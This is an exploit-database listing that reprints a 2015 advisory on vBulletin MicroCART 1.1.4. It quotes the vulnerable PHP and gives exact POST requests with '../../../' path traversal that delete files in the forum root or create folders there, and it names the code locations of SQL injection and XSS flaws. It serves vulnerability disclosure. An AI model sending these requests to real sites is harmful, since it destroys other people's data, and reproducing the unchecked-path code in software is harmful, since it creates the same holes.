header-logo
Suggest Exploit
vendor:
vBulletin MicroCART
by:
Technidev
7.5
CVSS
HIGH
Arbitrary File Deletion, SQL Injection & XSS
20
CWE
Product Name: vBulletin MicroCART
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: NO
Related CWE: N/A
CPE: a:vbulletin:vbulletin_microcart:1.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

vBulletin MicroCART 1.1.4 – Arbitrary File(s) Deletion, SQL Injection & XSS

This plugin is fairly old but still used by a lot of people and received its last update nearly 4 years ago. It’s vulnerable to arbitrary file deletion and SQL injection. By simply sending a POST request to the file folderdel_.php, we can delete every single file in specified folder. There’s another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this.

Mitigation:

Ensure that all user input is properly validated and sanitized. Implement authentication and authorization checks to ensure that only authorized users can access the application.
Source

Exploit-DB raw data:

# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, 
SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4

This plugin is fairly old but still used by a lot of people and received 
its last update nearly 4 years ago.
It’s vulnerable to arbitrary file deletion and SQL injection.

*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ are a bunch of files which are 
probably used to manage files/folders for the administrator, 
unfortunately no authentication and checks were added to see if the user 
should have access to it and if the request doesn’t contain anything 
malicious.

The /microcart/editor/assetmanager/folderdel_.php file contains the 
following on top:

$sMsg = "";

if(isset($_POST["inpCurrFolder"]))
   {
   $sDestination = pathinfo($_POST["inpCurrFolder"]);

   //DELETE ALL FILES IF FOLDER NOT EMPTY
     $dir = $_POST["inpCurrFolder"];
     $handle = opendir($dir);
     while($file = readdir($handle)) if($file != "." && $file != "..") 
unlink($dir . "/" . $file);
     closedir($handle);

   if(rmdir($_POST["inpCurrFolder"])==0)
     $sMsg = "";
   else
     $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
   }
By simply sending a POST request to this file, we can delete every 
single file in specified folder.

POST to:    /microcart/editor/assetmanager/folderdel_.php
POST data:    inpCurrFolder: ../../../
This POST request will delete every single .php file in the root folder 
of vBulletin.

*Arbitrary File Deletion*
There’s another vulnerability which resides in the 
/microcart/editor/assetmanager/assetmanager.php file. It contains an 
upload function, which is safe, and a file deletion function, which is 
not safe. We can delete any file off the server by abusing this. So 
unlike the previous vulnerability I just wrote which deletes all files 
by sending a POST request with a folder value, this will only delete 1 
file off the server.

Vulnerable code:
if(isset($_POST["inpFileToDelete"]))
   {
   $filename=pathinfo($_POST["inpFileToDelete"]);
   $filename=$filename['basename'];
   if($filename!="")
     unlink($currFolder . "/" . $filename);
   $sMsg = "";
   }
Exploited by sending the following request:

POST to:    /microcart/editor/assetmanager/assetmanager.php
POST data:    inpCurrFolder: ../../../
         inpFileToDelete: index.php
This will delete the /index.php file of vBulletin, in the root.

*Aribtrary Folder Creation*
Besides the file deletion, there’s a file called 
/microcart/editor/assetmanager/foldernew.php which created a 0755 
chmodded folder on the server.
The file contains the following on top:
$sMsg = "";

if(isset($_POST["inpNewFolderName"]))
   {
   $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];

   if(is_dir($sFolder)==1)
     {//folder already exist
     $sMsg = "<script>document.write(getTxt('Folder already 
exists.'))</script>";
     }
   else
     {
     //if(mkdir($sFolder))
     if(mkdir($sFolder,0755))
       $sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
     else
       $sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
     }
   }
By sending the following POST request, we will create a folder with 0755 
chmodded permission.

POST to:    /microcart/editor/assetmanager/foldernew.php
POST data:    inpNewFolderName:     davewashere
         inpCurrFolder:         ../../..
This POST request will create the folder davewashere in the root of the 
vBulletin forum.

*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations 
although most of them are rather hard to abuse. I will not explain how 
to exploit it, but the vulnerability can be found at /cart.php line 833 
to 881 and the function where you can add products to your shopping 
cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to 
the configuration variable which is later used in a query.

*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject 
anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out 
the wysiwyg POST key.

Navigation

Suggest Exploit

Services By CQR